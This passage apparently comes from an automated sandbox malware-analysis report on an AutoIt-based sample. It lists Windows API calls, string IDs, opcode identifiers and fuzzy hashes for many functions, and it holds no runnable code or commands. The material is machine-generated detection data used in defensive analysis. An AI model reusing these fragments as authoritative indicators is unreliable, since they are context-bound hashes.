                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend
                                                                                                                                                • String ID: '
                                                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                                                • Opcode ID: 316d84adafb31924a078e381f3059d900537ba4715654f42c8d31e46ccafa1b9
                                                                                                                                                • Instruction ID: eefaed8118d88fab61ea92c3efcf491a69c54d9fc3071c95109e59968292843d
                                                                                                                                                • Opcode Fuzzy Hash: 316d84adafb31924a078e381f3059d900537ba4715654f42c8d31e46ccafa1b9
                                                                                                                                                • Instruction Fuzzy Hash: 1E312874A1120A9FDB14DF69C980BDA7BB9FF9A700F50406AE904AB341DBB0E951CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002A327C
                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002A3287
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend
                                                                                                                                                • String ID: Combobox
                                                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                                                • Opcode ID: 545327e51a7e00eb876a9466c4238e3c384ec104cdbe4512a86093edf234af43
                                                                                                                                                • Instruction ID: 67fb3b6b60cf525607308e1efbaed461e440a90ed6e43ebca6844c865bc1871b
                                                                                                                                                • Opcode Fuzzy Hash: 545327e51a7e00eb876a9466c4238e3c384ec104cdbe4512a86093edf234af43
                                                                                                                                                • Instruction Fuzzy Hash: B411E6713202097FFF15DE54DC84FBB375AEB96364F100125F91897290DA319D618B60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0021600E: CreateWindowExW.USER32 ref: 0021604C
                                                                                                                                                  • Part of subcall function 0021600E: GetStockObject.GDI32(00000011), ref: 00216060
                                                                                                                                                  • Part of subcall function 0021600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0021606A
                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 002A377A
                                                                                                                                                • GetSysColor.USER32 ref: 002A3794
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                • String ID: static
                                                                                                                                                • API String ID: 1983116058-2160076837
                                                                                                                                                • Opcode ID: b17a1c4950ccc0fdd65ac2dd8f2dbea1d7e86a2270d75c0808e3ce9ff8ae0fe1
                                                                                                                                                • Instruction ID: a759fe289d60192f2e17b62ebc58c5160a04f470e99f4f80c4bced2c959aa19b
                                                                                                                                                • Opcode Fuzzy Hash: b17a1c4950ccc0fdd65ac2dd8f2dbea1d7e86a2270d75c0808e3ce9ff8ae0fe1
                                                                                                                                                • Instruction Fuzzy Hash: 07112CB262020AAFDB00DFA8DC45EFABBF8FB09354F104515F955E2250DB75E8619B50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0028CD7D
                                                                                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0028CDA6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Internet$OpenOption
                                                                                                                                                • String ID: <local>
                                                                                                                                                • API String ID: 942729171-4266983199
                                                                                                                                                • Opcode ID: d47f515d34048b3344f1c2047049ac95a8ad7ae117f8fefb2bf4128feb3c933e
                                                                                                                                                • Instruction ID: 07f9c7825bafc4e841f3cb60f3e98c71dc3f6337635bcb736988b7179ef52d44
                                                                                                                                                • Opcode Fuzzy Hash: d47f515d34048b3344f1c2047049ac95a8ad7ae117f8fefb2bf4128feb3c933e
                                                                                                                                                • Instruction Fuzzy Hash: 3B11A7751266327AD7286B668C49EE7BE5CEB127A4F204236B109831C0D7705861D7F0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetWindowTextLengthW.USER32 ref: 002A34AB
                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002A34BA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                                                • String ID: edit
                                                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                                                • Opcode ID: e8fe61d51ad981c00e44ce84b709bc31394d69d456c2ac8b227986f2a09ad162
                                                                                                                                                • Instruction ID: 29e8767cd0bd34433804724bce6002275e93bec5f12efff46ca11b0f5ef1b79d
                                                                                                                                                • Opcode Fuzzy Hash: e8fe61d51ad981c00e44ce84b709bc31394d69d456c2ac8b227986f2a09ad162
                                                                                                                                                • Instruction Fuzzy Hash: 5D119171520209AFEB11CE64EC44AFB376AEF1A774F604324F965971D0CB71DCA19B50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD
                                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00276CB6
                                                                                                                                                • _wcslen.LIBCMT ref: 00276CC2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                                                                                • String ID: STOP
                                                                                                                                                • API String ID: 1256254125-2411985666
                                                                                                                                                • Opcode ID: 4809b2d6766b8df8f1593c3f58db2df86958e97a04002d72ad2f5244cef82c1b
                                                                                                                                                • Instruction ID: 82f2ebb9a87cfd71c9f99bf2046d8a80390d76bcd1e33e82f302d00e022dd555
                                                                                                                                                • Opcode Fuzzy Hash: 4809b2d6766b8df8f1593c3f58db2df86958e97a04002d72ad2f5244cef82c1b
                                                                                                                                                • Instruction Fuzzy Hash: F50104326309278BCB21AFFDDC889BF33A4EA65710B104539E85696190EB31D960CA50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0022A529
                                                                                                                                                  • Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Init_thread_footer_wcslen
                                                                                                                                                • String ID: ,%.$3y&
                                                                                                                                                • API String ID: 2551934079-2574036372
                                                                                                                                                • Opcode ID: d31d2c9882f7f5317de6a5a909dc560a486b2da4a5ae8130e051bb7357ee2f2e
                                                                                                                                                • Instruction ID: b5981f9280d3bb059b276d62751f74cc193f2ad0f1ca1e2f8899103f62e710dc
                                                                                                                                                • Opcode Fuzzy Hash: d31d2c9882f7f5317de6a5a909dc560a486b2da4a5ae8130e051bb7357ee2f2e
                                                                                                                                                • Instruction Fuzzy Hash: 5B012B32B70660A7C504F7A8F9ABA9E73A89B06720FD00025F9065B5C2DE509DB58ED7
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002E3018,002E305C), ref: 002A81BF
                                                                                                                                                • CloseHandle.KERNEL32 ref: 002A81D1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                • String ID: \0.
                                                                                                                                                • API String ID: 3712363035-2574726650
                                                                                                                                                • Opcode ID: 1eba2f4db613bc2efccf379f8b2330686bef87274970a2df07e04bf2e0ee13bb
                                                                                                                                                • Instruction ID: a70bafd2a686982634856406212d18bd49f8590b8b904243fdb2005015d7b22b
                                                                                                                                                • Opcode Fuzzy Hash: 1eba2f4db613bc2efccf379f8b2330686bef87274970a2df07e04bf2e0ee13bb
                                                                                                                                                • Instruction Fuzzy Hash: D6F054F1690340BBE720E761FC4DFB73A5CDB05752F000460BB08DA1A1DA758A1486B4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen
                                                                                                                                                • String ID: 3, 3, 16, 1
                                                                                                                                                • API String ID: 176396367-3042988571
                                                                                                                                                • Opcode ID: a265634f4efd2ea47e0b3750de250e226ba8820302485d495857ca8d4418898b
                                                                                                                                                • Instruction ID: 43ac95061c1755017ec26ce0a497ed78ea21bf0572ed6e81f728c9c16007f18e
                                                                                                                                                • Opcode Fuzzy Hash: a265634f4efd2ea47e0b3750de250e226ba8820302485d495857ca8d4418898b
                                                                                                                                                • Instruction Fuzzy Hash: 39E0AB462342201083302239DCC1B7F4799CFC9760B10282BF880C2267EA888CB183A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Message
                                                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                                                • API String ID: 2030045667-4017498283
                                                                                                                                                • Opcode ID: 22a71343ed9ac5fc03a969eb37c3e2a719b13b70fa3050597cf29a305cf2669a
                                                                                                                                                • Instruction ID: 6713823ae5891aa4af603039c28c2dee7702ca7c3c9bcea453602a9e21dbc45d
                                                                                                                                                • Opcode Fuzzy Hash: 22a71343ed9ac5fc03a969eb37c3e2a719b13b70fa3050597cf29a305cf2669a
                                                                                                                                                • Instruction Fuzzy Hash: 51E0D83126432837D21437947D07FC9BA848F06B20F200467F748555C38FE168B04AE9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0022F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00230D71,?,?,?,0021100A), ref: 0022F7CE
                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,0021100A), ref: 00230D75
                                                                                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0021100A), ref: 00230D84
                                                                                                                                                Strings
                                                                                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00230D7F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                • API String ID: 55579361-631824599
                                                                                                                                                • Opcode ID: 2b84931a86c0d2bf643ff7b6eba004f69637a9a134e2c05225e3a2bbed67dd2d
                                                                                                                                                • Instruction ID: 5006ee3ab72cb96fe0e868afa226845d275fccef98f07e01696125683ca942c3
                                                                                                                                                • Opcode Fuzzy Hash: 2b84931a86c0d2bf643ff7b6eba004f69637a9a134e2c05225e3a2bbed67dd2d
                                                                                                                                                • Instruction Fuzzy Hash: FBE06DB02103518BE3609FB8E698746BBF0EB05740F00496DE882C6655DBB4E4948BA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0022E3D5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Init_thread_footer
                                                                                                                                                • String ID: 0%.$8%.
                                                                                                                                                • API String ID: 1385522511-764554917
                                                                                                                                                • Opcode ID: 3acd96835867d41815b38a2163ee6d8c84a9eb965d4b0295492a838fb2fae095
                                                                                                                                                • Instruction ID: f9b9ed2c95660304e8cec4d825218d3a000beea2eadda493d9e8aa2b5022d600
                                                                                                                                                • Opcode Fuzzy Hash: 3acd96835867d41815b38a2163ee6d8c84a9eb965d4b0295492a838fb2fae095
                                                                                                                                                • Instruction Fuzzy Hash: 9AE020314B0B74DBCE0CDB58B7E899C3359AB05321BD101E4F0034B1D5DBB018659A54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LocalTime
                                                                                                                                                • String ID: %.3d$X64
                                                                                                                                                • API String ID: 481472006-1077770165
                                                                                                                                                • Opcode ID: 83d78da49dcd8e8ed029355484adfb82e24f02ff2c7ad84341bcf9ab70d0c133
                                                                                                                                                • Instruction ID: c1ae8be1c40b5d1c916e888fd5e42a8f032e741803ab5c14d82c0644f81cfa1b
                                                                                                                                                • Opcode Fuzzy Hash: 83d78da49dcd8e8ed029355484adfb82e24f02ff2c7ad84341bcf9ab70d0c133
                                                                                                                                                • Instruction Fuzzy Hash: 2BD012B1D3811CFACB9096D0DC599B9B37CAB09301F608462FC0691041E7A8D5A86B61
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FindWindowW.USER32 ref: 002A232C
                                                                                                                                                • PostMessageW.USER32 ref: 002A233F
                                                                                                                                                  • Part of subcall function 0027E97B: Sleep.KERNEL32 ref: 0027E9F3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                                • Opcode ID: e2aa9293dffdfc807abeca247c0e345c877380f4771d4bb584b91baa3fb67b48
                                                                                                                                                • Instruction ID: 00c339d531a2169e2cf376124d7306408241b75700762e7802a0423883af0e86
                                                                                                                                                • Opcode Fuzzy Hash: e2aa9293dffdfc807abeca247c0e345c877380f4771d4bb584b91baa3fb67b48
                                                                                                                                                • Instruction Fuzzy Hash: AFD022323E0300B7E668B730EC0FFC6BA089B02B00F1049027349AA1D0CCF0A800CE10
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FindWindowW.USER32 ref: 002A236C
                                                                                                                                                • PostMessageW.USER32 ref: 002A2373
                                                                                                                                                  • Part of subcall function 0027E97B: Sleep.KERNEL32 ref: 0027E9F3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                                • Opcode ID: 5a76260697e5a9c19d8a621ded75206b817a1b2064daecfcd8dc57d0e9021da0
                                                                                                                                                • Instruction ID: d2af451661cf0b0389f17c839f9b5fb4887a773f5f62d3aab95d053cc61c51dd
                                                                                                                                                • Opcode Fuzzy Hash: 5a76260697e5a9c19d8a621ded75206b817a1b2064daecfcd8dc57d0e9021da0
                                                                                                                                                • Instruction Fuzzy Hash: 9ED0A9323D0300BBE668A730AC0FFC6A6089B06B00F1049027345AA1D0C8B0A8008A14
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%